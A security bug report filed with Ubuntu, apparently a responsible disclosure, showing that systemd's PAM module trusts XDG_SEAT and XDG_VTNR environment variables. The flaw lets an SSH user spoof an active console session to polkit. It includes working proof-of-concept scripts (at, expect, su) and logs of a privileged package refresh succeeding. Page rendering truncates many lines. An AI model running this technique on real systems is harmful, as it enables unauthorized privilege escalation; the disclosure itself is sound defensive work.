systemd: lack of seat verification in PAM module permits spoofing active session to polkit
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
systemd (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
[I am sending this bug report to Ubuntu as requested by systemd at
<https:/
As documented at
<https:/
any action, a polkit policy can specify separate levels of required
authentication based on whether a client is:
- in an active session on a local console
- in an inactive session on a local console
- or neither
This is expressed in the policy using the elements "allow_any",
"allow_inactive" and "allow_active". Very roughly speaking, the idea here is
to give special privileges to processes owned by users that are sitting
physically in front of the machine (or at least, a keyboard and a screen that
are connected to a machine), and restrict processes that e.g. belong to users
that are ssh'ing into a machine.
For example, the ability to refresh the system's package index is restricted
this way using a policy in
/usr/share/
<action id="org.
[...]
<descriptio
[...]
<message>
[...]
<defaults>
<
<
<
</defaults>
</action>
On systems that use systemd-logind, polkit determines whether a session is
associated with a local console by checking whether systemd-logind is tracking
the session as being associated with a "seat". This happens through
polkit_
polkitbackendse
The check whether a session is active works similarly.
systemd-logind is informed about the creation of new sessions by the PAM
module pam_systemd through a systemd message bus call from
pam_sm_
information supplied to it, apart from some consistency checks; that is not
directly a problem, since this RPC method can only be invoked by root.
This means that the PAM module needs to ensure that it doesn't pass incorrect
data to systemd-logind.
Looking at the code in the PAM module, however, you can see that the seat name
of the session and the virtual terminal number come from environment
variables:
seat = getenv_
cvtnr = getenv_
type = getenv_
class = getenv_
desktop = getenv_
This is actually documented at
<https:/
After some fixup logic that is irrelevant here, this data is then passed to
the RPC method.
One quirk of this issue is that a new session is only created if the calling
process is not already part of a session (based on the cgroups it is in,
parsed from procfs). This means that an attacker can't simply ssh into a
machine, set some environment variables, and then invoke a setuid binary that
uses PAM (such as "su") because ssh already triggers creation of a session via
PAM. But as it turns out, the systemd PAM module is only invoked for
interactive sessions:
# cat /usr/share/
Name: Register user sessions in the systemd control group hierarchy
Default: yes
Priority: 0
Session-
Session-Type: Additional
Session:
optional pam_systemd.so
So, under the following assumptions:
- we can run commands on the remote machine, e.g. via SSH
- our account can be used with "su" (it has a password and isn't disabled)
- the machine has no X server running and is currently displaying tty1, with
a login prompt
we can have our actions checked against the "allow_active" policies instead of
the "allow_any" policies as follows:
- SSH into the machine
- use "at" to schedule a job in one minute that does the following:
* wipe the environment
* set XDG_SEAT=seat0 and XDG_VTNR=1
* use "expect" to run "su -c {...} {our_username}" and enter our user's
password
* in the shell invoked by "su", perform the action we want to run under the
"allow_active" policy
I tested this in a Debian 10 VM, as follows ("{{{...}}}" have been replaced),
after ensuring that no sessions are active and the VM's screen is showing the
login prompt on tty1; all following commands are executed over SSH:
=======
normal_
#!/bin/sh
echo "===== OUTER TESTING PKCON" >/tmp/atjob.log
pkcon refresh -p </dev/null >>/tmp/atjob.log
env -i /home/normal_
normal_
#!/bin/sh
export XDG_SEAT=seat0
export XDG_VTNR=1
echo "===== ENV DUMP =====" > /tmp/atjob.log
env >> /tmp/atjob.log
echo "===== SESSION_OUTER =====" >> /tmp/atjob.log
cat /proc/self/cgroup >> /tmp/atjob.log
echo "===== OUTER LOGIN STATE =====" >> /tmp/atjob.log
loginctl --no-ask-password >> /tmp/atjob.log
echo "===== MIDDLE TESTING PKCON" >>/tmp/atjob.log
pkcon refresh -p </dev/null >>/tmp/atjob.log
/home/normal_
echo "======
normal_
#!/usr/bin/expect
spawn /bin/su -c "/home/
expect "Password: "
send "{{{PASSWORD}}}\n"
expect eof
normal_
#!/bin/sh
echo "===== INNER LOGIN STATE =====" >> /tmp/atjob.log
loginctl --no-ask-password >> /tmp/atjob.log
echo "===== SESSION_INNER =====" >> /tmp/atjob.log
cat /proc/self/cgroup >> /tmp/atjob.log
echo "===== INNER TESTING PKCON" >>/tmp/atjob.log
pkcon refresh -p </dev/null >>/tmp/atjob.log
normal_
SESSION UID USER SEAT TTY
7 1001 normal_user pts/0
1 sessions listed.
normal_
Transaction: Refreshing cache
Status: Waiting in queue
Status: Waiting for authentication
Status: Finished
Results:
Fatal error: Failed to obtain authentication.
normal_
warning: commands will be executed using /bin/sh
job 25 at {{{TIME}}}
{{{ wait here until specified time has been reached, plus time for the job to finish running}}}
normal_
===== ENV DUMP =====
XDG_SEAT=seat0
XDG_VTNR=1
PWD=/home/
===== SESSION_OUTER =====
10:memory:
9:freezer:/
8:pids:
7:perf_event:/
6:devices:
5:net_cls,
4:cpuset:/
3:blkio:/
2:cpu,cpuacct:/
1:name=
0::/system.
===== OUTER LOGIN STATE =====
SESSION UID USER SEAT TTY
7 1001 normal_user pts/0
1 sessions listed.
===== MIDDLE TESTING PKCON
Transaction: Refreshing cache
Status: Waiting in queue
Status: Waiting for authentication
Status: Finished
Results:
Fatal error: Failed to obtain authentication.
===== INNER LOGIN STATE =====
SESSION UID USER SEAT TTY
18 1001 normal_user seat0 pts/1
7 1001 normal_user pts/0
2 sessions listed.
===== SESSION_INNER =====
10:memory:
9:freezer:/
8:pids:
7:perf_event:/
6:devices:
5:net_cls,
4:cpuset:/
3:blkio:/
2:cpu,cpuacct:/
1:name=
0::/user.
===== INNER TESTING PKCON
Transaction: Refreshing cache
Status: Waiting in queue
Status: Waiting for authentication
Status: Waiting in queue
Status: Starting
Status: Loading cache
Percentage: 0
Percentage: 50
Percentage: 100
Percentage: 0
Percentage: 50
Percentage: 100
Status: Refreshing software list
Status: Downloading packages
Percentage: 0
Status: Running
Status: Loading cache
Percentage: 100
Status: Finished
Results:
Enabled http://
Enabled http://
Enabled http://
=======
You have new mail in /var/mail/
normal_
=======
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
CVE References
information type: | Private Security → Public Security |
Thanks for reporting this issue, we'll update this bug once we've investigated.